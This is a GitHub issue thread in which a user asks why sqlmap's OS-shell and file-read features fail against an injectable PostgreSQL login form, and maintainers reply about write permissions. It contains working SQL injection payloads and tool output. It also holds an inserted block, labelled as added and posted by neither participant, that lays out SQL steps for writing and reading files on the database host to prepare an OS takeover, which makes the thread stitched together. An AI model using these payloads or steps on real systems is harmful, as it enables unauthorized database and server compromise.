
Postgres - Odd UDF/file/OS operation behavior #1263

Closed
infernusdomoso opened this issue Jun 9, 2015 · 6 comments

Comments

@infernusdomoso

Not sure if this is a bug, or a bizarre condition of the specific database, but I'm testing an injection and it's performing very oddly. Sorry if this isn't the right place for a support question, I wasn't sure where else to ask.

The database is postgresql. The vulnerable statement is a select. In particular, the password field on a login form is injectable. (Yes, the password is not hashed/it's stored in plain text. Unbelievable). I am positive of this as a local file inclusion vulnerability gives me the ability to read the contents of most php files on the server.

Error based injection was correctly identified, (log in succeeds, injection worked. Log in fails, error), and I'm sure to discard cookies (that one drove me nuts for a few hours).

I can enumerate databases, tables, columns, etc, however, not a single thing I do with os-shell, os-cmd, file-read... none of it works.

It will check to see if a module has been uploaded, then hang, then switch to a time based check, then "seem" to read something, returning empty data, then fail and say it cannot be done.

The DB user is a dba (as far as --is-dba is concerned). The injection is on a select statement. Stacked queries are available.

Is there any good reason the other operations would not work?

Here's a copy of the output:

[10:10:59] [INFO] testing connection to the target URL

Parameter: password (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=test1&flag=login&password=test1' AND 4952=4952 AND 'TJtW'='TJtW

Type: stacked queries
Title: PostgreSQL > 8.1 stacked queries (comment)
Payload: username=test1&flag=login&password=test1';SELECT PG_SLEEP(5)--

Type: AND/OR time-based blind
Title: PostgreSQL > 8.1 AND time-based blind
Payload: username=test1&flag=login&password=test1' AND 1385=(SELECT 1385 FROM PG_SLEEP(5)) AND 'dTlV'='dTlV

[10:11:02] [INFO] the back-end DBMS is PostgreSQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: PostgreSQL
[10:11:02] [INFO] fingerprinting the back-end DBMS operating system
[10:11:04] [INFO] the back-end DBMS operating system is Linux
[10:11:05] [INFO] testing if current user is DBA
[10:11:07] [INFO] detecting back-end DBMS version from its banner
[10:11:07] [INFO] retrieving the length of query output
[10:11:07] [INFO] retrieved: 6
[10:11:30] [INFO] retrieved: 9.1.11
what is the back-end database management system architecture?
[1] 32-bit (default)
[2] 64-bit

1
[10:11:30] [INFO] checking if UDF 'sys_eval' already exist <-- This line completes quickly
[10:11:30] [INFO] checking if UDF 'sys_exec' already exist <-- This hangs for a while
[10:11:48] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
[10:11:48] [CRITICAL] considerable lagging has been detected in connection response(s). Please use as high value for option '--time-sec' as possible (e.g. 10 or more)
[10:11:52] [INFO] retrieving the length of query output
[10:11:52] [INFO] retrieved: <--- hangs for a bit as if it were retrieving data
[10:11:54] [INFO] retrieved: <--- same
[10:11:55] [WARNING] multi-threading is considered unsafe in time-based data retrieval. Going to switch it off automatically
[10:11:55] [INFO] retrieved: <--- again, hangs as if retrieving data
[10:12:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:12:00] [WARNING] it looks like the file has not been written (usually occurs if the DBMS process' user has no write privileges in the destination path)
[10:12:02] [ERROR] there has been a problem uploading the shared library, it looks like the binary file has not been written on the database underlying file system
do you want to proceed anyway? Beware that the operating system takeover will fail [y/N] N
[10:12:02] [CRITICAL] unable to mount the operating system takeover

@infernusdomoso
Author

I've since come to learn that the DB server is not actually on the web server - that being said - shouldn't an OS command like 'ls' still return data however?

@stamparm
Member

stamparm commented Jun 9, 2015

But the UDF has to be written and created on the same server where the DBMS is located.

@stamparm
Member

stamparm commented Jun 9, 2015

Disregard last comment. This looks like a duplicate of #1170

@stamparm
Member

stamparm commented Jun 9, 2015

Also, the DBMS has to have write access rights. DBMS admin is not the same as root.

@infernusdomoso
Author

Aah. I'm 100x more familiar with MySQL - so in postgres --is-dba is not enough, it has to be the root account? I haven't yet seen which permission needs to be set to do psql UDFs.
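The two preconditions discussed in this thread (the UDF must land on the host running PostgreSQL, and the file is written by the postmaster's OS user, not by the SQL role and not by root) can be checked by hand before letting a tool attempt the upload. The queries below are an added example for this thread, not sqlmap's own code and not posted by either participant; they assume PostgreSQL 8.2 or later (so `COPY (query) TO` exists), a superuser role, and a probe path `/tmp/udf_probe` chosen here purely for illustration. Run them as stacked queries through the injection point or directly in psql.

```sql
-- Added example (not from sqlmap or the thread): preconditions for a
-- PostgreSQL UDF-based OS takeover. Assumes PostgreSQL >= 8.2 and a
-- superuser role; '/tmp/udf_probe' is an illustrative path, not a fixed one.

-- 1. Is the injected role a superuser? This is what sqlmap's --is-dba
--    answers. It says nothing about what the OS user 'postgres' may write.
SELECT rolname, rolsuper, rolcreatedb
FROM   pg_roles
WHERE  rolname = current_user;

-- 2. Which host is the DBMS actually on? Compare with the web server's
--    address. If they differ, a library written by the DBMS never reaches
--    the web host, and an LFI on the web host will not find it.
SELECT inet_server_addr() AS db_listen_addr,
       inet_server_port() AS db_port,
       version()          AS banner;   -- banner also shows 32-/64-bit build

-- 3. Superuser-only setting: the cluster directory, a location the
--    postmaster's OS user is guaranteed to own and be able to write to.
SELECT current_setting('data_directory') AS data_directory;

-- 4. Write probe using the same mechanism a UDF upload relies on.
--    COPY ... TO creates the file as the OS user running the postmaster
--    (normally 'postgres'), not as root. A "Permission denied" error here
--    reproduces the "file has not been written" warning in the sqlmap log.
COPY (SELECT 'probe') TO '/tmp/udf_probe';

-- 5. Confirm the write landed on the DBMS host's filesystem
--    (pg_ls_dir and pg_read_file are superuser-only in 9.x).
SELECT name
FROM   pg_ls_dir('/tmp') AS d(name)
WHERE  name = 'udf_probe';

SELECT pg_read_file('/tmp/udf_probe', 0, 64) AS probe_contents;
```

If step 4 succeeds in `/tmp` but not in the directory you intended, point the upload at a path the `postgres` OS user can write to rather than at a root-owned one. Note that core PostgreSQL 9.1 has no built-in function to delete a server-side file, so the probe stays behind until removed through the UDF itself or by an administrator.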

@stamparm
Member

I am closing this one down as duplicate of #1170. There is a MAJOR issue in PostgreSQL that we need to handle.
